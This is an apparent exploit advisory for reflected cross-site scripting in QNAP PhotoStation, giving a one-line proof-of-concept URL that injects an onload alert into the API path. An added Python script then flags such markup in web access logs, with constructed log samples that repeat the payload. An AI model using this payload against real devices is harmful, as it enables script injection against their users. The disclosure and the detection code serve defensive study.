# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/


1. Description

Parameter validation is not implemented correctly in this application, so attackers can carry out an XSS attack against this web app.



2. Proof of Concept

https://[Site]:4443/photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php
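
A defender-side check for the request pattern in the proof of concept, as an added example that is not part of the original advisory: it percent-decodes the path of each access-log request and flags HTML markup in a path under /photo/. The log lines, IP addresses, status codes and function names are constructed for illustration, and a combined-style access log is assumed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (documentation IPs, made-up status codes).
SAMPLE_LOG = """\
198.51.100.7 - - [22/May/2018:10:01:02 +0000] "GET /photo/api/index.php HTTP/1.1" 200 512
198.51.100.9 - - [22/May/2018:10:01:05 +0000] "GET /photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php HTTP/1.1" 404 310
203.0.113.4 - - [22/May/2018:10:02:00 +0000] "GET /photo/api/index.php?q=a%3Cb HTTP/1.1" 200 1024
203.0.113.4 - - [22/May/2018:10:02:07 +0000] "GET /photo/api/my%20album.php HTTP/1.1" 404 280
""".splitlines()

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Angle brackets or an inline event-handler attribute have no place in a file path.
MARKUP_RE = re.compile(r"[<>]|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_path(target, max_rounds=3):
    """Return the path part of a request target, percent-decoded until stable."""
    path = urlsplit(target).path          # drop the query string and fragment
    for _ in range(max_rounds):           # bounded, so nested encoding cannot loop forever
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def find_path_markup(lines, prefix="/photo/"):
    """Return (ip, status, decoded_path) for requests whose path carries HTML markup."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue                      # not a request line in the assumed format
        path = decode_path(m.group("target"))
        if path.startswith(prefix) and MARKUP_RE.search(path):
            hits.append((m.group("ip"), int(m.group("status")), path))
    return hits


if __name__ == "__main__":
    for ip, status, path in find_path_markup(SAMPLE_LOG):
        print(f"{ip} status={status} path={path!r}")
```

The rule looks only at the path, which is where the proof of concept places its markup; query-string parameters need their own review.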